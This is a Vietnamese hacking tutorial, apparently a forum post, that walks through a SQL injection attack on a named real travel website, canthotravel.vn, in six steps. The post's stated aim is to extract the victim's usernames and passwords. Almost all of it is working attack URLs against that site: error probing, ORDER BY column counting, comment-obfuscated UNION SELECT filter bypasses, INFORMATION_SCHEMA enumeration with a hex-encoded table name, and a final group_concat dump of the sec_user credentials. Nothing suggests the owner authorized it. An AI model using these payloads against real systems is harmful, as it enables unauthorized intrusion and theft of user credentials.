Đề bài là hãy show user và pass của victim : canthotravel.vn bắt đầu nào
Step 1 : Thêm ‘ để kiểm tra xem site đó trả về như thế nào . ngoài cách thêm ‘ ta còn có thể sử dụng các cách khác như
PHP:
And 1=0 And 1=1 " ') ")
Ví dụ thực thế vào victim
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664' http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664') http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+and+1=0--+
Sau khi đã kiểm tra xong ta xác định site này dính lỗi SQLi vì nó bị mất hết nội dung
Step 2 : Ta lại tiếp tục kiếm các cột của nó có 2 cách để tìm được cột nó bằng
PHP:
ORDER BY 1-- - GROUP BY 1-- -
Nó cũng khá là dễ nên không nói sâu vào
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+10--+ http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+50--+ http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+1000--+
Tại sao lạ thế ta đã thử hết mà nó cũng không ra cột lỗi ta thử xét truy vấn đầu vào thêm ‘ sau id xem nào
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+10--+ http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+6--+ http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+5--+
Cột lỗi đã xuất hiện cột lỗi là 5
Step 3 : Ta tiếp tục dùng lệnh UNION SELECT để khai thác nó site này mình check thử trước rồi không cần phải bypass nhưng đối với 1 vài site khác cần bypass đoạn này thì các bạn cứ áp dụng các cách bypass 403 404
PHP:
/*!UNION*/ SELECT /*!UNION SELECT */ UNION /*!SELECT */ /*!50000UNION*/ /*!50000SELECT */ UnIoN SeLeCT UNION /*!50000SELECT*/
Còn nhiều nữa nhưng bạn cứ thử các cách trên là để bypass cơ bản nhất tiếp tục nào
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+union+select+1,2,3,4,5--+
Vẫn không xuất hiện gì bây giờ ta cũng có 2 cách 1 là ta thêm – trước id= ví dụ id=-1 cách 2 là ta thay thế id= là NULL ví dụ id=NULL
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=-1387986664%27+union+select+1,2,3,4,5--+ http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,4,5--+
Số xuất hiện là 2 và 4 ở đây tôi chọn số 4
Step 4 : Bây giờ tới đây ta chèn vào ngay vị trí của số 4 như sau
và sau cùng ta thêm
để có thể khai thác được table name của web đó
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(TABLE_NAME),5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--+
Phù lúc này ta có được các table sau
Chà khá là nhiều ta không quan tâm đề kêu là kiếm admin ta xem sơ qua và thấy sec_user ta chọn table này và tiếp tục khai thác nó
Step 5 : Ta sử dụng query cũng giông như step 4 nhưng ta lại thay đổi chữ table_name thành column_name và table_schema=database thành table_name=Mã hex table
Mã hex table có nghĩ là bạn phải hex cái table mà bạn chọn có nhiều website hỗ trợ tính năng hex thậm chí ngay cả firefox bạn cũng có thể web hỗ trợ
Ở đây ta chọn table sec_user nên hex nó => 0x7365635f75736572 nhớ phải thêm 0x trước mã hex
câu lênh hoàn chỉnh
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(COLUMN_NAME),5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7365635f75736572--+
kết quả nhận được là
Step 6 : Ok đã có đầy đủ .. Table : Sec_user ; data column là : username và user_password ta tiến hành bước cuối nào
áp dụng vào site
PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=null%27+union+select+1,2,3,group_concat(username,0x7c,user_password),5+from+sec_user--+
Hehe xong bài 
Cảm ơn các bạn đã xem
